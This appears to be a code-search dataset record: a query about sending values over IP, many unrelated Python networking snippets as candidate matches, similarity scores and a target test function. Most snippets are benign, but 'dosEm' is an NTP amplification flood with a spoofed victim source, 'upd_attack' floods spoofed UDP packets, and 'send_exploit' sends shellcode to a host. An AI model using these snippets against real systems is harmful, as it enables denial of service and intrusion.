"def none(self):", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def na(fluid,network,propname,**params):\n value = -1\n network.set_pore_data(phase=fluid,prop=propname,data=value)", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def __str__(self):\n return self.the_ip", "def _decode_none(value):\n return value", "def test_email_is_None(self):\n settings.GTMETRIX_REST_API_EMAIL = None\n with raises(GTmetrixEmailIsNone):\n gt = GTmetrixInterface()", "def test_default_country_by_ip_no_settings(self):\n\n response = self.client.get(\n reverse(\"billing_info\"), HTTP_X_FORWARDED_FOR=\"85.214.132.117\"\n )\n self.assertEqual(response.status_code, 200)\n self.assertContains(\n response, '<option value=\"\" selected>---------</option>', html=True\n )", "def test_init_no_ip(self):\n # mocks of files\n rsa_ca_priv_file, rsa_priv_file, rsa_cert_file = range(3)\n\n ap = APInfo(port_id=1, ip=None, mac=\"bb:bb:bb:bb:bb:bb\", radio_mac=\"bb:bb:bb:bb:bb:00\", udp_port=12345, wlc_ip='1.1.1.1',\n gateway_ip='1.1.1.2', ap_mode=APMode.LOCAL, rsa_ca_priv_file=rsa_ca_priv_file, rsa_priv_file=rsa_priv_file, rsa_cert_file=rsa_cert_file)\n self.assertEqual(ap.ip, None)", "def _validateIpNN(dErrors, sName, sValue):\n (sValue, sError) = ModelDataBase.validateIp(sValue, fAllowNull = False);\n if sError is not None:\n dErrors[sName] = sError;\n return sValue;", "def __init__(self, ip, mask):\n self.vip = ip\n self.mask = mask", "def public_ip_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"public_ip_address\")", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def send(value):\r\n return value", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def _server_address() -> Optional[str]:\n return None", "def softupdate_ip(request, ipaddress):\n\n softupdate_key = settings.SOFTUPDATE_KEY\n if request.POST.get(\"key\", \"invalid_key\") != softupdate_key:\n raise PermissionDenied()\n\n # LC: UGGLY and not \"portable\"\n STATUS_EN_SERVICE = 'En service'\n\n def noanswer(reason=\"\"):\n message = \"\"\"Modification impossible.\\n\"\"\"\n if reason and settings.DEBUG:\n message += \"\"\"%s\\n\"\"\" % (reason,)\n return HttpResponse(message, content_type=\"plain/text\")\n\n serial = request.POST.get(\"serial\", None)\n hostname = request.POST.get(\"hostname\", None)\n\n host = None\n errmsgs = []\n\n if serial:\n hosts = Host.objects.filter(serial=serial)\n if len(hosts) == 1:\n host = hosts[0]\n elif len(hosts) > 1:\n for h in hosts:\n if h.ip == ipaddress:\n host = h\n break\n\n if not host:\n errmsgs.append(\"Le host serial=%s est introuvable.\" % (serial,))\n\n if hostname and not host:\n hosts = Host.objects.filter(hostname=hostname,\n status__description=STATUS_EN_SERVICE)\n if len(hosts) == 1:\n host = hosts[0]\n elif len(hosts) > 1:\n for h in hosts:\n if h.ip == ipaddress:\n host = h\n break\n\n # Get the last log entry\n hostlogs = HostIPLog.objects.filter(host=host, log_ip=ipaddress) \\\n .order_by(\"-date\")\n if hostlogs:\n hostlog = hostlogs[0]\n else:\n hostlog = HostIPLog(host=host, log_ip=ipaddress)\n \n hostlog.log_queryfrom = get_request_remote_addr(request)\n hostlog.log_hostname = request.POST.get('hostname', 'unknown')\n hostlog.save()\n\n return HttpResponse('ok.', content_type='plain/text')", "def test_no_ip_address_passed(self, api_client):\n runner = CliRunner()\n\n with patch(\"greynoise.cli.helper.sys\") as sys:\n sys.stdin.isatty.return_value = True\n result = runner.invoke(\n subcommand.ip, parent=Context(main, info_name=\"greynoise\")\n )\n assert result.exit_code == -1\n assert \"Usage: greynoise ip\" in result.output\n api_client.ip.assert_not_called()", "def render_ethIP(self, ctx, data):\n iface = data\n \n def ret(ipadd):\n ips = []\n for i in ipadd.strip('\\n').split('\\n'):\n ln = i.strip('\\n').strip()\n if not ln:\n continue\n ips.append(i.split()[1])\n\n if ips:\n return ctx.tag[\n [[ip, tags.br] for ip in ips]\n ]\n else:\n return [\"None assigned\"]\n \n return WebUtils.system('ip addr show dev %s | grep \"inet \"' % iface).addBoth(ret)" ]
[ "0.5996742", "0.586887", "0.586887", "0.5854512", "0.5837289", "0.577436", "0.5667391", "0.5623846", "0.56065077", "0.55768406", "0.5550488", "0.55322266", "0.54811656", "0.54618883", "0.54348487", "0.54248166", "0.541617", "0.54040885", "0.53847426", "0.53496665", "0.53496665", "0.5349264", "0.5347085", "0.53384", "0.5332145", "0.53252417", "0.5323079", "0.53045195", "0.5301259", "0.52820104", "0.5272688", "0.5270564", "0.52563", "0.52526516", "0.5242395", "0.5242395", "0.5242395", "0.5242395", "0.52360874", "0.52201927", "0.52140033", "0.5212197", "0.5209124", "0.5206477", "0.52056265", "0.52056265", "0.5180363", "0.51727265", "0.51708376", "0.51665366", "0.5154006", "0.5154006", "0.5140343", "0.51275104", "0.51152146", "0.5103364", "0.5103364", "0.51019984", "0.5091074", "0.509014", "0.50867414", "0.50781506", "0.50765425", "0.50694686", "0.5062961", "0.5062734", "0.5059899", "0.50427246", "0.5035386", "0.50324154", "0.5024569", "0.502389", "0.5018825", "0.50183123", "0.5016825", "0.5015123", "0.500128", "0.49984753", "0.4994548", "0.4994467", "0.49936318", "0.4990226", "0.49863678", "0.49796546", "0.49768493", "0.49752748", "0.49699652", "0.49667615", "0.49633387", "0.49601528", "0.49564457", "0.49560207", "0.49485067", "0.4943868", "0.49408832", "0.49381334", "0.49355012", "0.49343517", "0.4931658", "0.49313754", "0.49304825" ]
0.0
-1
Send some letters value in IP
def test_48(self): assert 'False' == Api.requestBlock('test-48', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def _send(self, what, value, address='localhost:44818', **kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def send(value):\r\n return value", "def echo(s_socket):\r\n value = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(value) + 5, 4, 'little')\r\n s_socket.send('d' + bytes_value + value)\r\n print(s_socket.recv(64))", "def hex2ip(self, irc, msg, args, iphex):\n \n ip = self._numToDottedQuad(iphex)\n if ip and len(iphex) == 8:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n else:\n reply = u'Invalide Eingabe'\n irc.reply(reply.encode('utf-8'))", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def ip2host(self, irc, msg, args, ip):\n \n try:\n hostname = socket.gethostbyaddr(ip)\n hostname = hostname[0]\n if hostname:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (hostname, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n except:\n reply = u'gethostbyaddr() Error'\n \n irc.reply(reply.encode('utf-8'))", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_ip(self):", "def wr32(add,dat):\r\n global this_fpga_ip\r\n global this_sock\r\n global this_udp_port\r\n \r\n pkt = array.array('L')\r\n pkt.append(1001) #psn\r\n pkt.append(2) #opcode\r\n pkt.append(1) #noo\r\n pkt.append(add) #sa\r\n pkt.append(dat) #dat\r\n \r\n this_sock.sendto(bytes(pkt.tostring()),(this_fpga_ip,this_udp_port))\r\n data, addr = this_sock.recvfrom(10240)\r\n return", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def _send(self, p: str, s) -> bytes:\n\n b = self._to_netstring(p.encode('ascii'))\n\n failure = s.sendall(b)\n if failure is not None:\n self._send(p, s)\n return b", "def send_exploit(ip: str, port: int) -> None:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((ip, port))\n sock.settimeout(5)\n sock.send(build_buf(add_shellcode()))\n try:\n print(sock.recv(1024))\n except socket.timeout:\n pass\n finally:\n sock.close()", "def injectERP(amp=1,host=\"localhost\",port=8300):\n import socket\n try:\n socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0).sendto(bytes(amp),(host,port))\n except: # sliently igore any errors\n pass", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def handle_ip(bot, ievent):\n try:\n item = ievent.args[0]\n except IndexError:\n ievent.missing('<hostname>')\n return\n try:\n ipnr = socket.gethostbyname(item)\n ievent.reply(ipnr)\n except:\n ievent.reply(\"can't match \" + str(item))", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def send(self, x):\n print x", "def send_magic_packet(\n *macs: str,\n ip_address: str = BROADCAST_IP,\n port: int = DEFAULT_PORT,\n interface: Optional[str] = None\n) -> None:\n packets = [create_magic_packet(mac) for mac in macs]\n\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n if interface is not None:\n sock.bind((interface, 0))\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.connect((ip_address, port))\n for packet in packets:\n sock.send(packet)", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. Jones!\n pass", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def host2ip(self, irc, msg, args, hostname):\n \n try:\n ip = socket.gethostbyname(hostname)\n if ip:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n \n except:\n reply = u'gethostbyname() Error'\n \n irc.reply(reply.encode('utf-8'))", "def ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip = s.getsockname()[0]\n s.close()\n return ip", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def sendTCP_raw_single(m,ip,port):\n s=socket.socket()\n s.settimeout(1)\n s.connect((ip,port))\n s.send(m.data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def change_IP(self,server_IP,MAC):\n content = {'server_IP':server_IP,'MAC_address':MAC}\n content = json.dumps(content)\n headers = {\"Content-Type\":\"application/json\"}\n #address will be given by the api\n r = requests.post(f\"http://{self.webserver_address}/api/camera/update_ip\", data = content,headers = headers,verify=False)\n if(r.status_code == 200):\n return True\n return False", "def sendInstruction(self, instruction):\n # instruction = '!'\n print(f'Sending: {instruction}')\n self.ser.write(instruction.encode(\"ascii\"))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n # decoded_bytes = (ser_bytes.decode(\"ascii\"))\n # print(f'Ascii Value: {decoded_bytes}', flush=True)", "def sendString(self, data):\n self.transport.write(pack(\"!i\",len(data))+data)", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def send(self, s):\n self.port.write(bytes(s, 'latin-1'))\n sys.stdout.write(s)", "def for_ip_address_truenas_controller_2_enter_ip_select_28_netmask(driver, ip, netmask):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').send_keys(ip)\n driver.find_element_by_xpath('//mat-select[@ix-auto=\"input__Failover IP Address (TrueNAS Controller 2)\"]').click()\n driver.find_element_by_xpath(f'//mat-option[@ix-auto=\"option__{netmask}\"]').click()", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def send(self, value):\n pass", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def _send(self, raw, addr):\n raise NotImplementedError('implement using any Transport Layer')", "def send_arp( ifname , address ):\n\ttry:\n\t\teth_socket = socket.socket( socket.AF_PACKET , socket.SOCK_RAW) ;\n\t\teth_socket.bind( (ifname , ETH_TYPE_ARP) ) ;\n\t\tprint eth_socket.getsockname() ;\n\t\teth_addr = eth_socket.getsockname()[4] ;\n\t\t\n\texcept socket.error, (errno , msg ) :\n\t\tif errno == 1 :\n\t\t\tprint \"arp message can only be sent by root\" \n\t\t\tclose( eth_socket ) ;\n\t\t\treturn False ;\n\t\n\tarp_frame = [\n\t\tstruct.pack( \"!h\" , 1 ) ,\n\n\t\tstruct.pack(\"!h\", 0x0800 ) ,\n\n\t\tstruct.pack(\"!B\" , 6 ) ,\n\n\t\tstruct.pack(\"!B\" , 4 ) ,\n\n\t\tstruct.pack(\"!h\" , ARP_REQUEST ) ,# request\n\n\t\teth_addr , # sender\n\n\t\tsocket.inet_aton( sender_IP ) , # sender\n\n\t\tETH_ZERO,\n\n\t\tsocket.inet_aton( another_IP )\n\t]\n\n\teth_frame = [\n\t\tETH_BROADCAST,\n\n\t\teth_addr ,\n\t\tstruct.pack(\"!h\" , ETH_TYPE_ARP ),\n\t\t''.join( arp_frame )\n\n\t]\n\n\teth_socket.send(''.join(eth_frame) );\n\teth_socket.close();", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def render_ethIP(self, ctx, data):\n iface = data\n \n def ret(ipadd):\n ips = []\n for i in ipadd.strip('\\n').split('\\n'):\n ln = i.strip('\\n').strip()\n if not ln:\n continue\n ips.append(i.split()[1])\n\n if ips:\n return ctx.tag[\n [[ip, tags.br] for ip in ips]\n ]\n else:\n return [\"None assigned\"]\n \n return WebUtils.system('ip addr show dev %s | grep \"inet \"' % iface).addBoth(ret)", "def setIpaddr(self):\n\t\tself.ipaddr = self.settings.getKeyValue('ipaddr')\n\t\tself.socket.send('setenv ipaddr ' + self.ipaddr+'\\r', 1)\t\t\n\t\treturn None", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def set_host_ip(self, host, host_ip):\n host.setIP(str(host_ip.ip), prefixLen=self.NETPREFIX)", "def spoof_packet(packet):", "def geoip(self, irc, msg, args, ip):\n \n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n irc.reply(reply.encode('utf-8'))", "def setIP(self, idx, ip):\n self.ip[int(idx)-1] = ip", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def api_myip():\n return request.remote_addr, 200, {'Content-Type': 'text/plain'}", "def get_address(self):\r\n return \"iDigi\"", "def sendto(self, data: bytes, address: Tuple) -> int:\n ...", "def send_pan(self, value=63, ch=None):\n self.send_control_change(PAN, value, ch=ch)", "def sendPing(self, payload=None):", "def upd_attack(host, cmds):\n\ttry:\n\t\tport = int(cmds[2])\n\t\tamount = 1\n\t\ttry: \n\t\t\tamount = int(cmds[3])\n\t\texcept IndexError as i:\n\t\t\tamount = 1\n\t\tfor i in range(0, amount):\n\t\t\tIP_Packet = IP()\n\t\t\tIP_Packet.src = randomIP()\n\t\t\tIP_Packet.dst = host\n\t\t\tsend(IP_Packet/UDP(dport=port))\n\t\tprint(\"sent %s UDP Packets\" % amount)\n\t\tprint(\"UDP Packet details:\")\n\t\tudp = UDP(dport=port)\n\t\tudp.show()\n\texcept Exception as e:\n\t\tprint('something went wrong in udp_attack ', e)\n\t\tprint('cmds: ', cmds)", "def __str__(self):\n return self.the_ip", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def getnetwork(ipaddr):\n return '192.168.1.0/24'", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def ip_info():\n return str(getIP())", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))", "def sendTCP_raw_bytes(data,ip,port):\n s=socket.socket()\n s.settimeout(3)\n s.connect((ip,port))\n s.send(data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def send_packet(self, p: str):\n\n self._send(p, self.socket)", "def func(self):\n return 'AAA{0[iface]}BBB{0[port]}'.format(self.opts)", "def change_ip(self, address: int) -> None:\n self.regs[\"ip\"].write(address)", "def transmit(self,char):\n\t\tif len(char) == 1 and self._connected == True:\n\t\t\tself._sock.send(char)", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". Kindly do not share it with anyone\")", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def new_ip(self, ip):\n if not ip in self.ip_list:\n self.ip_list.add(ip)\n host = self.hs.id_to_object(ip)\n host.add_tag('sniffer')\n host.save()\n print_success(\"New ip address: {}\".format(ip))", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def sendto(self,msg,address):\n\n address = self.pubIPToMorse(address);\n \n if not self.validIPAndPort:\n print(\"Error: Invalid IP and port or socket has not been bound with an IP and port: message not sent!\");\n return;\n\n to_ip_addr = address[0];\n to_port = address[1];\n msg = msg.decode(\"utf-8\"); #Convert from bytearray to a string for ease of operation\n\n # Assemble UDP package\n udp_package = to_port + self.my_port + msg;\n\n # Assemble IP package\n ip_header = to_ip_addr + self.my_ip_addr + self.protocol_identifier + t.base36encode(len(udp_package));\n ip_package = ip_header + udp_package;\n\n # Assemble MAC package\n # First check to see if the MAC of the recieving IP is known, if not address message to router\n if to_ip_addr in self.macDict.keys(): mac_to = self.macDict[to_ip_addr];\n else: mac_to = self.macDict['router_mac']; # This only works if you're not the router...\n # Then assemble the remainder of the MAC package\n mac_from = self.my_mac;\n # Send the message\n print(mac_to+mac_from+ip_package)\n t.sendMessage(mac_to,mac_from,ip_package);", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def send_udp_message(message, address, port):\n message = message.replace(\" \", \"\").replace(\"\\n\", \"\")\n server_address = (address, port)\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n sock.sendto(binascii.unhexlify(message), server_address)\n while True:\n data, _ = sock.recvfrom(4096)\n ss = binascii.hexlify(data).decode(\"utf-8\")\n sss = ss[82:]\n global test\n test = test+sss\n if ss == \"ffffff\":\n break\n\n finally:\n sock.close()\n return binascii.hexlify(data).decode(\"utf-8\")", "def getIP():\n data = _get_page(\"http://myip.cz\")\n data = data.split(\"Your IP Address is: <b>\")[-1].split(\"</b>\")[0]\n return data.strip()", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def ip(self, ip: str):\n\n self._ip = ip", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def get_local_host_ip(self) -> str:", "def request_new_ip(self, mac):\n self.execute_script('new_ip', mac)", "def sendMessage(self, data, (host, port)):\n\t\tdef send_to_ip(IPaddrs):\n\t\t\tself.transport.write(data, (IPaddrs, port))\n\t\t\tself.resolvedAdrs[host] = IPaddrs\n\t\ttry:\n\t\t\tself.transport.write(data, (self.resolvedAdrs[host], port))\n\t\texcept KeyError, e:\n\t\t\t# Resolve and call the send function\n\t\t\treactor.resolve(host).addCallback(send_to_ip)", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' + str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', \"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = \":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def sendall(self, s):\r\n self.write(s)", "def send(self, data):\n print \"Attempting to send packet of size %d to %s\" % (len(data), self.hostname)\n self.sock.sendto(data, (self.dst_ip, 0))", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def send(self, val, end=\"\\n\"):\n self.sock.send(to_bytes(\"{val}{end}\".format(val=val, end=end)))", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def send_command(s, IP, PORT, sec, cmd, seq, 